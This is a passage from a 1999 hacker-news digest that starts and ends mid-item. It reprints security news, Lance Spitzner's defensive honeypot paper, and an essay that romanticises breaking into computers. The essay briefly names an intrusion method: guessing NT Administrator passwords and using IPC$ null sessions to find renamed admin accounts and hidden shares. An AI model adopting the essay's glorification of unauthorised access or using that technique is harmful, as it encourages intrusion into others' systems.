"To alter the code or text, you have to have administrative access to
change the content or to stop the system."
Mr Burton, who is also a senior partner in CDT, said the company began
working on the technology after attacks on high-profile Web sites.
"This came about from evidence that significant Web sites were being
hacked and destroyed.
"We believed we could deliver a protection device in software form that
could be downloaded from our Web site by whoever was hosting that
particular site.
CDT declined to reveal further details of the technology pending
approval of a patent on SecurePage.
If you decide to take up CDT's challenge to crack its software,
Computers & High Technology wants to know. E-mail us at
auscomp@ozemail.com.au � but only if you are successful.
@HWA
26.0 CCC Camp About to Get Under Way
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Frank
The organizers of CCC Camp continue their preparations
for this weekend. It is expected that 3000 people will
descend onto a field outside Berlin where they will share
secrets of technology and discuss issues that affect us
all. And pick a few locks.
Wired
http://www.wired.com/news/news/culture/story/21104.html?wnpg=1
HNN Cons Page
http://www.hackernews.com/cons/cons.html
Chaos in Berlin
by Steve Kettmann
3:00 a.m. 5.Aug.99.PDT
BERLIN -- This weekend's Chaos Communication Camp outside East Berlin will be more than just a good time, event organizers say.
The three-day event will be a combination hacker-fest, technology be-in, workshop smorgasbord, celebration of camping and swimming, and
lock-picking seminar -- with metal locks, for a change. Around 3,000 people are expected to attend, each paying an entrance fee of DM150
(US$82).
See also: Geekstock: German Hackfest
The event will be the first of its kind in Germany, but it draws on the tradition established with two similar events in the Netherlands. CCC
organizers have consulted with the people behind Hacking in Progress, the most recent of which was held outside of Amsterdam in scorching
weather two summers ago.
"We've worked a lot with the Amsterdam people," said Chaos Computer Club spokesman Andy Muller-Maguhn. "Five of them even moved to Berlin for
three months to help us get organized, and another 20 are coming for the camp.
"HIP was a great experience, but the workshop part of the program was a catastrophe. The heat was so bad and they had tents rented from a
circus. The sound was so bad, you couldn't hear it from 10 feet away."
Besides hiring a security company with expertise in handling tech events (and decorating them), CCC organizers can also rely on the German flair for
organization. More than 300 volunteers have already assembled outside East Berlin and laid down three kilometers of fiber optic cable and 14
kilometers of power cable, among other things. Every aspect of the weekend has been planned diligently.
The goal is to provide more than a "hacker holiday," as Muller-Maguhn put it. He aims to encourage some deep thinking about technology and where
it's going -- and not just from the kind of people who are light-years ahead of the rest of us.
In fact, the first of the 27 workshops is intended to help general-interest participants get a handle on things. It will be called "How to ask for help
on the Net," and will be led by CCC member Ron Fulda.
"We will not be able to benefit from technology if people feel overrun by it, if people feel handled by machines, rather than feeling that they can
handle them," said Muller-Maguhn.
"There are a lot of people 35 or 40 who are unemployed because they were replaced in their job by a fucking machine. They just don't understand
it."
The nod to the less sophisticated is probably a good idea. As much as people in Berlin and elsewhere in Germany might respect the CCC for some of
its high-profile exploits -- like hacking into NASA's computer in the mid-'80s -- some worry that they are losing touch with mainstream computer
users.
"The Chaos Computer Club has done some very interesting things," said Herbert Thaten, whose Netz-Werk cybercafe in East Berlin does a booming
business.
"They stand for finding holes in the computer systems of big companies. But I went to one of their workshops last year, and it was only for
specialists. No one there could understand what the speaker was talking about."
The complete list of workshops was due to be posted shortly at the CCC Web site, but another example of the more accessible workshops is
"Creating Politics of Crypto Software," led by American hacker Lucky Green. More than half the workshops are in English, and all will be freewheeling
affairs, if organizers have their way.
"We have a very qualified audience in an informal setting," said another CCC spokesman, Frank Rieger. "If someone is standing up there telling
bullshit, he will only be doing it about one minute and then someone will correct him."
It's easy to take Rieger at his word, sitting with him in the CCC offices in East Berlin, near Humboldt University, not far from Bertolt-Brecht-Platz.
One large white wall is devoid of notable decoration, except for a black-and-white poster of Mahatma Gandhi kneeling and reading -- with an Apple
logo in one corner.
High on an adjacent wall, next to a painting of Christ -- so the tone of ironic worship is not lost -- is a liberated fa�ade from a Geldautomat, a
German ATM machine.
The hacker movement in Germany is so high profile it has established itself almost as a branch of government. And it wrestles openly with the
question of how to respond to technology. Stefan Wernery, one of the two founding fathers of the CCC, devotes much of his time these days to
lock-picking on good, old-fashioned metal, � la Artemus Gordon -- just the sort of thing the least tech-conscious person can appreciate.
"It's sort of lock-picking as sporting event," said Rieger. "They are teaching people how unsecure locks are."
Even if they may lose touch with the masses at times, CCC members spend a lot of time thinking about how they connect with the general public.
"We can say it's important to give the normal people -- and also politicians and journalists -- an understanding of how the tools work,"
Muller-Maguhn said. "In America, more people have email, yes, but technology is driven by big corporations that think about profit and things like
customer profiling.
"For us it's important to give all groups an understanding of how computers and networks work. Compared to the US, the European public has very
critical discussions about technology. Maybe that's one reason why technology is not integrated so rapidly.
"People are not as careless as in the United States. They ask, 'What if?' They think about 1984 and Big Brother. That's always on our minds, so we
don't have computers that can be switched to fascist mode," Muller-Maguhn said.
That might even translate into Europeans, always considered backward when it comes to new technologies, having a little something to show their
American counterparts.
"The American hacker community is organized very differently than ours," said Muller-Maguhn. "I find it strange. Some groups are very political.
Some are very technical. I have the feeling there is a very little in common between them. I don't even think they like each other.
"In Europe we try to be both. We consult with politicians on censoring and so forth, and of course we are in a way a public institution. We try to
provide information, freedom, and transparency of technology."
@HWA
27.0 Hackers... Those Who Would Be Gods
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Hex_Edit
A very interesting perspective about why some people
do what they do has been sent to us by a member of
the the group "HackCanada". Hex_Edit asks whether it is
for the knowledge, just to post graffiti, testing security,
or some other reason that drives some members of the
community.
Hackers... Those Who Would Be Gods
http://www.hackernews.com/orig/why.html
Hackers... Those who would be gods
Why do we hack?
Is it to alter webpages and leave some type of cybergang
inner-city graffiti? Is it to laugh in the face of over-paid,
under-qualified sysadmins? Well for myself, and everyone I
associate with, the answer to both of those would be no.
So then, why do we do it? To seek knowledge? Perhaps...
That is definitely an overused and somewhat groundless
excuse. We seek knowledge and wisdom every waking
moment. Every breath we inhale leases us another 3
seconds of learning. Yes breaching a network's security
does without a doubt involve learning. Yet do we not, on
occasion, breach systems using exactly the same method
as we have used previously? So in that case, why do we
do it? If you have broken one NT box by guessing the
Administrators password, why would we do it again to a
different NT machine? Have we not already learned how to
use an IPC$ share to gain the name of the re-named
Admin account? We already know how to glean hidden
shares from the aforementioned null connection. What are
we learning from repeating the task? Nothing. So why
then? I suppose the first few times, is in the hope that
you will run into a new challenge. And sometimes we do,
but is it often enough to chalk it all up to the great quest
for knowledge? I personally wonder if that is true. Maybe
as much as we shudder to admit it, it all comes down to
two reasons. One is simply because it is there, and
because we can. The other is slightly more sinister... We
are voyeurs. We want to know what interesting stuff is on
the other side. Whether we are corporate voyeurs, or
peeping toms rifling through some hapless 98 users
hard-drive. Sir Edmond Hillary once said, when questioned
as to why he wished to climb Everest, "Simply because it
is there." Are we really that shallow? Do we do this all
simply because we can? Is the great quest for knowledge
nothing more than what we tell ourselves to appease our
conscience? Yet on the other hand I feel that there must
be more to it. Maybe we really do have a primal thirst for
information that isn't readily available to us. Perhaps we
have a hidden side, that no one ever sees. A side that
nothing ever senses but our keyboards. A darker vampiric,
hematophagous side that thirsts for the life giving
hemoglobin of information. A part of us so powerful it has
altered our very genetic state. Have we evolved past the
majority of our peers? Have we become demi-gods of a
brave new "virtual" world?
If you could imagine for a second, that we were to carry
the same abilities and powers into the real world. What
would we see? You are having an annoying conversation
with someone you dislike, in a heartbeat they vanish from
sight. You could instantly alter every part of your
appearance, as to be totally unrecognizable, or to appear
to be someone else entirely. Any company or person you
wished, with a wave of your hand, they would lose the
ability to communicate with anyone else in the world. You
could be a ghost, and ethereally pass through any locked
door or alarm system. You could grab any piece of
information you desired from that home or office, and pass
back through it's locked doors, with out any trace.
Would these abilities not elevate us above normal human
status? Is coding not the act of creation on a God like
scale? "I wrote a little telnet app yesterday." Would
translate, "Well you know, it took me a couple of hours,
but I built this nifty little machine that allows me to
instantly teleport myself to anywhere in the world." If that
is the translation for writing a telnet app, what would
everyone think of the guys that wrote Half life? :)
So then back to our lives in this virtual world. Are we
Gods? No. To us there is only one true God. And that is
the Internet herself. All of her protocols, and operating
systems. All of her routers, switches, fiber, and servers.
Every tiny part of her, that communicate so eloquently
together, as to create a whole. A whole entire being, that
we all reside within. This is our God. This is whom we
choose to worship. So what are we then my Hacker
brethren? We make up less than 1% of all who reside
within. Are we priests? No, I would place that label on the
sysadmins, and helpdesk jockeys who instruct the herd.
Perhaps we are Demons? Do demons not belong to the
darkside, to the anti-God? If the Internet is our God, who
is our Devil? Is it possible to have a positive without a
negative, a Yin without a Yang? We must have an
anti-God, yet what? I am not sure I know the answer.
Could it be all that seek to control her? All that seek to
bend our God to their gluttonous financial and controlling
gain? It sounds plausible, and don't we battle against
these powers? Do we not war against the very idea of
governments and corporations altering our brave new
world? If we are warriors of our God, would that not make
us Angels?
Thousands of years from now, our descendants may read
their bible and understand how we all fought gallantly
against the forces of darkness to ensure they lived in a
world free of tyranny and oppression. They would read
how the few battled fearlessly against the many, how we
couldn't fathom the far-reaching consequences of our
actions. They would marvel at how many of us were
captured and destroyed, with out even knowing why we
had to fight.
So maybe we really don't need to grasp at an ethereal
"why". It may all be pre-ordained, maybe we are just
meant to do what we do, and it will all be revealed further
down the long treacherous road. Then again...
It is possible we are all just vitamin E deficient, socially
inept humans, with a burning desire to wreak havoc, and
feel power and respect we aren't afforded in our daily
lives. Perhaps it is none of these things, yet that isn't for
me to decide. I personally like the idea of throwing down
my gauntlet, and standing as an avenging angel beside my
God. Ready to war against all that would seek to harm
her.
Hex_Edit
08/04/99
Note: No email was provided so no permission was sought to reprint
this article from HNN normally we contact the authors. - Ed
@HWA
28.0 European Crypto Mailing List
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by LouisC
A new mailing list for the discussion of cryptography
issues in the European Union has been started. You can
subscribe by sending email to majordomo@fitug.de that
contains the words "subscribe eucrypto"
JYA.com
http://jya.com/eucrypto.htm
29.0 "Ya Wanna Be Hackers, Code Crackers, or just AOL Chat Room Yackers?"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Dr. Mudge
Weird Al's latest video "Its All About the Pentiums" from
his latest album "Running With Scissors" should be
available online today at 3:30 PM (EST). It will first be
debuted on MTV's Total Request Live. "Your waxing
Your Modem to Make it Go Faster", "Your about as
useless as jpegs to Helen Keller", "You say your C=64 is
really neato? What kind of chip you got in there a
Dorito?" This album rocks.
Running With Scisssors- via Amazon.com
http://www.amazon.com/exec/obidos/ASIN/B00000JH89/thehackernewsnet
Weird Al Yankovich
http://www.weirdal.com
Its All About the Pentiums
http://www.thepentiums.com
Note; if you haven't heard this song or don't like Weird Al for some reason you
HAVE to listen to it, its totally hilarious ... - Ed
@HWA
30.0 WHO DO YOU WANT TO BE TODAY?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Thejian, Thursday 5th August 1999 on 8:20 pm CET
Novell has released Digitalme, a software product that is said to allow Internet users
to control their own online identity and make it easier, and safer, to respond to online
user surveys. Once information is asked by a Web site, Digitalme steps in and
provides only the facts about you you want others to know, making you as
anonymous as you want to be. Full story below.
http://www2.idg.com.au/cwt1997.nsf/8525601d005a204e85255fdc007c1fce/ddddc180892f6fa24a2567c20021527b?OpenDocument
SYDNEY - Novell has released software it says allows Internet users to control their own online identity.
Digitalme is designed to make it easier, and safer, to respond to the user surveys often required to
enter a Web site, Novell officials said. Everyone needs to be able to manage their identity on the
Internet but in the past you've had to let others do it for you and you had no control over what they
did with your information," said Novell's director of technology and education services, Glen Jobson.
Digitalme takes the company's Novell Directory Services (NDS) to the Internet. Users of the Novell's NetWare
networking operating system are already familiar with the concept of an enterprise-wide directory that securely
stores information about almost anything. Increasingly, users of Windows NT are becoming aware of directory
services through the anticipation being generated by Microsoft around Active Directory. And quite a number of
NT users have also discovered NDS since it recently went cross-platform. The digitalme push is set to take
NDS right onto the public agenda and into the hearts and minds of everyone who has ever had to log in to
anything on the Internet. The concept is simple enough. You tell someone you trust, maybe your bank, perhaps
your ISP, everything that anyone on the Net would ever be likely to ask. When a site asks you to provide that
information, there's no need to start typing. The digitalme agent steps up to the screen and completes it for
you. Furthermore, the data communicated between digitalme and the Web site is encrypted and subject to an audit
trail.
Digitalme won't fill in any more information than you've told it you're happy to provide. If the site wants more
information, digitalme will tell you what else is requested and seek your approval before handing out your
particulars. You can even instruct digitalme to render an anonymous version of yourself to the Web site.
The digitalme information is stored in an online vault, so users are no longer stumped when they use a foreign PC,
to visit a favourite site. The first vault is being set up by Novell itself at a new site, www.digitalme.com.
We're putting everything on the site that you need, as an end user or a developer,; Jobson said.
You can get the client there, you can store your details in our vault, and you can download the source code and
APIs so that you can build your own digitalme clients.
Why would someone build their own clients?
the whole Internet isn't going to want Novell to be the keeper of their personal data. We expect banks, online
shops, finance advisers and Internet service providers, will want to manage their own vaults and encourage you
to keep your details with them.
Why would you trust them?
This software only allows them to store your details securely. It doesn't allow them to read what's inside.
Only you, the owner, can see what's inside, and only you can authorise the information to be released to third
parties,; Jobson said.
(c) Copyright 1999 ComputerWorld. All rights reserved.
@HWA
31.0 NAI GROUPSHIELD FOR EXCHANGE BUG
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Thursday 5th August 1999 on 4:20 am CET
This is a known but unnannounced bug in Network Associates Inc's Groupshield for
Exchange AV-software, causing mail messages to disappear without warning or
trace. The problem is known to NAI and they're said to be investigating the problem.
Full story below.
http://www.infoworld.com/cgi-bin/displayStory.pl?99084.ennai.htm
NAI Groupshield for Exchange bug causes message loss
By Ed Foster
InfoWorld Electric
Posted at 2:31 PM PT, Aug 4, 1999
A known but unannounced bug in Network Associates Inc.'s (NAI's) Groupshield for Exchange anti-virus product can cause messages from Exchange
connectors to disappear.
Users who have suffered from the bug report losing thousands of mail messages without warning or trace. Messages being scanned for viruses by
Groupshield as they come through mail connectors are inadvertently dropped before reaching the Exchange server, according to the users.
After describing the problem to NAI support engineers, users were told it is a known problem, but the company's only recommendation was that they
disable virus scanning of all external mail connectors including those for the Internet mail, MS Mail, and cc:Mail.
"When we called NAI, they knew of the problem," reported one frustrated user. "Their recommendation is to exclude any connectors from scanning, such as
Internet or MS Mail. There is no indication anywhere of any problems in release notes or their [Web] site, even now. Even worse, they knew that the bug
lost data."
NAI officials contacted by InfoWorld said they could not confirm the existence of the bug, but are investigating it. They also acknowledged that earlier
versions of the product -- before Groupshield for Exchange 4.03, released last month -- had a "message-locking feature" which under certain circumstances
could inadvertently lock virus-free messages and prevent them from reaching the server. Such messages, however, can be recovered by the Groupshield
administrator, they said, adding that they were unaware of circumstances in which messages would be permanently erased.
Users insisted, however, that messages are completely erased and that NAI support has confirmed that fact.
"It's not message locking; it's message disappearing," said another user who has repeatedly reproduced the problem using Groupshield with an MS Mail
connector for Exchange. "We'd turn off their virus protection and the messages would all flow through. Turn it back on and the messages all vanish. Try it on
another machine, and the same thing happens."
Network Associates Inc., in Santa Clara, Calif., is at www.nai.com.
@HWA
32.0 How the blackhats work
~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
TO BUILD A HONEYPOT
by Thejian, Thursday 5th August 1999 on 3:50 am CET
Many people asked Lance Spitzner how he was able to track black-hats in the act of
probing for and compromising a system. Now he wrote a paper discussing just that. It
discusses how to built, implement and monitor a honeypot network designed
specifically to learn how black-hats work. Read the paper.
http://www.enteract.com/~lspitz/honeypot.html - (Check here for other papers written by Lance - Ed)
Lance Spitzner
Last Modified: 4 August, 1999
This article is a follow up to the "Know Your Enemy" series. Many people from the Internet community asked me how I was able to track
black-hats in the act of probing for and compromising a system. This paper discusses just that. Here I describe how I built, implemented, and
monitored a honeypot network designed specifically to learn how black-hats work.
What is a Honeypot?
For me, a honeypot is a system designed to teach how black-hats probe for and exploit a system. By learning their tools and methods, you can then better protect
your network and systems. I do not use honeypots to capture the bad guy. I want to learn how they work without them knowing they are being watched. For me, a
well designed honeypot means the black-hat never knew he was being tracked. There are a variety of different approaches on how you can do this. Mine is only
one of many.
Before I continue, I would like to post a disclaimer. No honeypot can catch/capture all the bad guys out there. There are too many ways to spoof/hide your
actions. Instead of going into detail on how this is possible, I highly recommend you check out Insertion, Evasion, and Denial of Service: Eluding Network Intrusion
Detection or Bane software, . Also, throughout this paper I use the term black-hat. To me, a black-hat is anyone who is attempting un-authorized access to a
system. This could be an 15 year old kid from Seattle, or a 45 year old company employee in accounting. Throughout this paper our black-hat is referred to as he,
however we have no idea what the true gender of the black-hat is.
Where to Begin?
There are a variety of different approaches to building a honeypot. Mine was based on simplicity. Build a standard box that I wanted to learn how the black-hat
community was compromising. In this case it was Linux, but you can just as easily use Solaris, NT, or any other operating system. Don't do anything special to this
system, build it as you would any other. Then put the system on the Internet and wait. Sooner or later someone will find the system and attack it. The system is
built to be attacked and compromised, someone will gain root on that system, that is the goal. However, while they are gaining root (or Admin), you are tracking
their every move.
This approach is different from other concepts. Network Associates has built a commercial product called CyberCop Sting, Designed to run on NT, this product
can emulate variety of different systems at the same time, including Linux, Solaris, Cisco IOS, and NT. Fred Cohen has developed the deception toolkit, which are
a variety of tools intended to make it appear to attackers as if a system has a large number of widely known vulnerabilities. One of my favorites is NFR's
BackOfficer Friendly, which emulates a Back Orifice server. All of these have their advantages. However, my goal was to build a honeypot that mirrored my
production systems, so I could better understand what vulnerabilities and threats existed for my production network. Also, the fewer modifications I make to the
honeypot, the less chance the black-hat will find something "fishy" on the box. I do not want the black-hat to ever learn that he was on a honeypot.
The Plan
My plan was simple. Build a box I wanted to learn about, put it on the network, and then wait. However, there were several problems to this. First, how do I
track the black-hats moves.? Second, how do I alert myself when the system is probed or compromised? Last, how do I stop the black-hat from compromising
other systems? The solution to this was simple, put the honeypot on its own network behind a firewall. This solves a variety of problems.
- First, most firewalls log all traffic going through it. This becomes the first layer of tracking the black-hat's moves. By reviewing the firewall logs, we can begin
to determine how black-hats probe our honeypot and what they are looking for.
- Second, most firewalls have some alerting capability. You can build simple alerts whenever someone probes your network. Since no one should be
connecting to your honeypot, any packets sent to it are most likely black-hats probing the system. If there is any traffic coming FROM the honeypot out to
the Internet, then the honeypot was most likely compromised. For an example on how set up alerting with Check Point FireWall-1, click here.
- Third, the firewall can control what traffic comes in and what traffic goes out. In this case, the firewall lets everything from the Internet in, but only limited
traffic out. This way the black-hats can find, probe, and exploit our honeypot, but they cannot compromise other systems.
The goal is to have our honeypot behind a controlled system. Most firewalls will do, as long as it can both control and log traffic going through it.
Tracking Their Moves
Now, the real trick becomes how to track their moves without them knowing it. First, you do not want to depend on a single source of information. Something can
go wrong, things can be erased, etc. I prefer to track in layers. That way, if something does go wrong, you have additional sources of information. Also, you can
compare different sources to paint a better picture.
Personally, I do not like to log information on the honeypot itself. There are two reasons for this. First, the fewer modification you make to the honeypot, the
better. The more changes you make, the better the chance a black-hat will discover something is up. The second reason is you can easily lose the information.
Don't forget, sooner or later the black-hat will have root on the honeypot. Several times I have had data altered, or in one case, the entire hard drive wiped clean.
Our goal is to track the enemies moves, but log all the data on a system they cannot access. As we discussed above, our first layer of tracking is the firewall logs.
Besides this, I track the black-hat's moves several other ways.
A second layer I use is the system logs on the honeypot. System logs provide valuable data, as they tell us what the kernel and user processes are doing. However,
the first thing a black-hat normally does is wipe the system logs and replace syslogd. So, the challenge becomes logging syslog activity to another server, but without
the black-hat knowing it. I do this by first building a dedicated syslog server, normally on a different network separated by the firewall. Then I recompile syslogd on
the honeypot to read a different configuration file, such as /var/tmp/.conf. This way the black-hat does not realize where the real configuration file is. This is simply
done by changing the entry "/etc/syslog.conf" in the source code to whatever file you want. We then setup our new configuration file to log both locally and to the
remote log server (example). Make sure you maintain a standard copy of the configuration file, /etc/syslog.conf, which points to all local logging. Even though this
configuration file is now useless, this will throw off the black-hat from realizing the true destination of our remote logging. Now, you will capture all system logs up to
and including when the system is compromised. This will help tell us how the system was probed and compromised. It is also very interesting comparing these true
system logs to the logs a black-hat has "cleaned" on a compromised system. This is the only time where I make a modification on the honeypot.
The only problem with using a remote syslog server is it can be detected with a sniffer. Normally, black-hats either kill or replace syslogd when they gain root. If
so, they can no longer sniff the syslog packets, since there are no longer any packets sent. However, if the black-hat does not modify nor kill the syslogd dameon,
then they could sniff the packets sent. For the truly devious, you could send your syslogd traffic using a different protocol, such as IPX, which are normally not
sniffed. Your level of paranoia may vary. There are also several alternatives you can use to standard syslogd. CORE-SDI has ssyslog, which implements a
cryptographic protocol called PEO-1 that allows the remote auditing of system logs. For you NT users, they also have a Windows version, called slogger. There is
also syslog-ng, developed by BalaBit Software, which is similiar in use to ssyslog, but uses SHA1 instead. All versions are free and open source.
My third layer of tracking (the firewall is the first, syslogd hack is the second) is to use a sniffer. I run a sniffer on the firewall that sniffs any traffic going to or from
the honeypot. Since the honeypot is isolated by the firewall, you know all traffic has to go through the firewall. The advantage of a sniffer is it picks up all
keystrokes and screen captures, to include STDIN, STDOUT, and STDERR. This way you see exactly what the black-hat is seeing. Also, all the information is
stored on the firewall, safely protected from the black-hat (I hope :). A disadvantage is the black-hat can hide his moves with encryption, such as ssh. However, if
you are not running any such services on your honeypot, the blackhat may not use them. Also, a sniffer can be spoofed by advanced users, as discussed by the
paper linked above.
I've had great success using sniffit, a commonly used black-hat tool used to sniff passwords. It does this by sniffing the first 300 bytes of every packet. By
configuring sniffit to capture the full payload of every packet, you can capture all the keystrokes in most sessions (example). Another excellent sniffer you may want
to consider is snort, which has additional IDS capabilities.
Finally, I run tripwire on the honeypot (there is also a NT version). Tripwire tells us what binaries have been altered on a compromised system (such as a new
account added to /etc/passwd or a trojaned binary). I do this by running tripwire from a floppy, then storing the tripwire database to a floppy. You do NOT want
any tripwire information stored locally on the system. By storing it on removable media, you can guarantee the integrity of the data. As an added precaution, I
recommend compiling tripwire as statically linked. This way you are not using libraries that may be compromised on the honeypot. For the truly paranoid, boot off a
floopy (such as tomsrtbt), then run tripwire. This protects against trojaned kernel modules. Tripwire is an excellent way to determine if you system has been
compromised. Also, it is an excellent forensic tool that helps identify what modifications the black-hat has made.
You may find these layers as redundant. But remember, no single layer of information can capture all the traffic. Also, different sources give you different
information. For example, most systems cannot detect stealth scans, however, many firewalls can. If your firewall logs your honeypot being scanned, but there is
nothing in the system logs, then you were most likely scanned by a "stealth" scanner, such as nmap. Also, we are not perfect. Often while tweaking one service, you
munge another. You could accidentally kill system logging or the sniffer. By having other layers of information, you still can put a picture together of what happened.
If you develop any of your own methods of tracking, I highly recommend you implement them. The more layers you have, the better off you are. If you have any
methods you would like to recommend, I would love to hear from. Additional methods can include hacking the system shell or kernel to log keystrokes, but to be
dead honest, I haven't developed the skills yet to do that.
The Sting
Remember, our goal is to learn about the black-hat, without him ever knowing he was had. To gain a better understanding of this strategy, I highly recommend you
watch one of my favorite movies, The Sting. We want to attract the black-hats, monitor them, let them gain root, and then eventually kick them off the system, all
without them getting supicious. To attract black-hats, I like to name my honeypot enticing names, such as ns1.example.com (name server), mail.example.com (mail
server), or intranet.example.com (internal web server). These are often primary targets for black-hats. Once we have enticed them, use the methods discussed
above to track their actions.
Once the black-hat gains root, the question becomes, now what? Normally, I continue to monitor the black-hat for several days, to learn what he is up to.
However, you have to be careful, eventually the black-hat will catch on that he is on a honeypot. If he does, bad things can happen.. What I like to do is once I
learn everything I can, I kick the black-hat off, normally by rebooting the box. I do this with the shutdown command, sending a message to all logged on users (the
black-hat), stating the system is going down for routine maintenance. I then take the system off-line, remove the backdoors the black-hat made, and bring the
system back online. Or, you can reinstall, building a new system. I recommend you fix the vulnerability that was used to gain access last time, so you can learn
about new exploits/vulnerabilities.
The other issue is limiting the black-hat, we do not want him launching attacks from our own system. I do this by using the firewall. Remember, all traffic to and
from the honeypot must go through the firewall. I use a rulebase that allows anything from the Internet to reach our firewall, but only limited traffic outbound
(basically, the exact opposite of what a firewall is designed to do). The trick is, allowing enough outbound traffic so a black-hat does not get supicious, but we still
have to limit their capabilities. If you block everything outbound, the black-hat will know right away that something is up. If you allow everything outbound, the
black-hat can blatantly scan the Internet from your system. You now become liable for his actions, so we have to find a balance. Normally the first thing a black-hat
does following access is to download their tool set. If they can't reach the Internet, they are going to cover their tracks and leave your system. What has worked
for me is to allow all traffic inbound, and allow FTP, ICMP, and DNS (UDP) outbound. Normally, this is enough for the black-hat without them getting supiscious
right away, but denies them utilizing most of their tools outbound. Your mileage may vary.
Thats it. All that is let left is to wait for the black-hat to strike (kind of like fishing). Ensure you have a good alerting mechanism, so you know as soon as possible
when your system is being probed or has been compromised. You want to get as much information as soon as possible. You do not want the black-hat to catch on
before you know he is there, bad karma may be coming your way. Good luck!
Conclusion
Honeypots are an extremely powerful tool that allows you to learn about the black-hat community. Correctly implemented, they give you an inside window on how
the black-hat community works. There are a variety of different approaches to building and implementing a honeypot, mine is only one of many. My goal is to build
a simple system that mirrors the production network. then sit back and wait. The key to tracking the enemy is layers. Do not depend on a single layer of
information, as it can be altered or lost. By comparing different layers of information, you can also gain a better understanding of what the black-hat was doing.
Happy hunting :)
Author's bio
Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up
things of a different nature. You can reach him at lance@spitzner.net .
@HWA
33.0 ADMINS ASLEEP ON WATCH?
~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Thursday 5th August 1999 on 3:40 am CET
"An Incident Note released by the CERT Coordination Center at Carnegie Mellon
University suggests that crackers are using scripts to automatically probe for different
vulnerabilities in rapid succession." Hence the term "script kiddie". Seems this
reporter is figuring out the fact that most servers get "hacked" by utilizing known
holes. ZDNet.
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Security administrator: Heal thyself
By David Raikow, Sm@rt Reseller
August 4, 1999 6:25 AM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2308725,00.html
When it comes to security, system administrators like to think of themselves as defenders of the
home-front, locked in an ongoing battle of wits with a horde of marauding invaders. But a recent
round of attacks on UNIX servers suggests that, in reality, many administrators are asleep on
watch.
In an Incident Note released July 22, the CERT Coordination Center at Carnegie Mellon
University described a wave of "Similar Attacks Using Various RPC [Remote Procedure Call]
Services." Evidence from targeted servers suggests that crackers are using scripts to automatically
probe for different vulnerabilities in rapid succession. Any one of these security holes could permit
the cracker root-level access to the server, completely compromising its security and threatening
any associated machines.
While these type of alerts usually address newly discovered vulnerabilities or cracking techniques,
this report was disturbing precisely because there was nothing new about it.
Each of the security holes attacked by the scripts is well known and documented. Each has been
fixed by free patches available from vendors. But because many sysadmins are lax about updating
their software, the attacks often succeed anyway. Indeed, the type of "shotgun" approach that this
automated approach suggests is attractive only if crackers suspect that a substantial percentage of
servers are vulnerable.
Security often takes a back seat to other priorities, as sysadmins focus on meeting the increasing
demands placed on network systems, according to a CERT technician. Short term, immediate
user needs tend to trump potential threats from unknown sources.
"Security is an ongoing thing, and people don't always recognize the threat," says CERT Technical
Coordinator Quinn Peyton, "Often good administrators are hampered because they lack the
appropriate resources."
Cracks Are Costly
The costs of a root-level security breach can be devastating, however. According to CERT,
compromised machines must be disconnected from the network, their drives wiped, and their OS
software reinstalled from clean media. Any data restored from backups must be carefully
scrutinized to prevent reintroduction of backdoors or viruses. Any and all sensitive information --
including passwords -- also has been compromised and must be changed. Finally all associated
machines must also be scoured for any signs of intrusion.
CERT does point out one silver lining to this cloud.
"Once people are compromised, they tend to be much more diligent," notes Peyton. "Nobody
wants to go through that twice."
@HWA
34.0 THEFT HURTS THE WELL
~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Wednesday 4th August 1999 on 1:30 am CET
A computer containing customer credit card numbers has been stolen from GST
Whole Earth Networks' San Francisco office. Among those vulnerable for credit card
fraud are some longstanding members of online community The WELL, although no
fraudulent use has been reported yet or is much expected since the data was
encrypted. Wired.
http://www.wired.com/news/news/technology/story/21076.html
Computer Theft Hurts The WELL
by Chris Gaither
12:30 p.m. 3.Aug.99.PDT
A computer loaded with customer credit card numbers has been swiped from GST Whole Earth Networks' San Francisco office.
Among those vulnerable to credit card fraud are some longstanding members of The WELL, one of the Internet's first online communities. The WELL
has no ISP of its own, and many members were grandfathered in to Whole Earth's WeNet service through a series of takeovers.
No fraudulent use of the cards has been reported. The information was encrypted, according to GST.
"That's great," Gail Ann Williams, executive director of The WELL, said of the encryption. "That's the ultimate defense we all dream of."
About 2,700 of The WELL's 7,000 customers use the WeNet ISP, according to Andrew Ross, vice president of marketing for Salon.com, The WELL's
parent company. GST Telecommunications, WeNet's parent company, would not comment or answer questions about the theft Tuesday, saying
they were too busy preparing an annual earnings announcement.
However, on Monday the company issued a release saying that credit card companies were immediately notified of the theft.
Jennifer Powell, a member of The WELL since 1993, said the bank canceled her husband's credit card as a precautionary measure. She is thankful
that no fraud has been reported, but she said her husband must now update payment information with every service paid for with that credit card.
"It's not severe, but it's a pain," she said.
The WELL provided Internet service until 1996, when it split off its ISP division. Whole Networks then took over the division, and GST
Telecommunications took over Whole Networks, bringing along some of The WELL's customers for the ride.
@HWA
35.0 MICROSOFT SECURITY FLAWS
~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Tuesday 3rd August 1999 on 7:50 pm CET
New York Times did an article on every growing number of bugs regarding Microsoft
Internet Explorer.The main problem comes when IE opens Word, Power Point or
Excel documents and it assumes that the documents are safe, so it doesn't open
any warning box. Microsoft have a solution to this problem in a little Java applet. Read
the article here.
http://www.nytimes.com/library/tech/99/08/biztech/articles/03soft.html
Software Makers Scramble to Address Security Flaw
By SARA ROBINSON
SAN FRANCISCO -- Three giants of the computer industry --
Microsoft, Hewlett-Packard and Compaq Computer -- found
themselves scrambling on Tuesday to address a rash of serious security
vulnerabilities in software designed to interact with Microsoft's Internet
Explorer Web browser.
The flaws, first made public last week, are
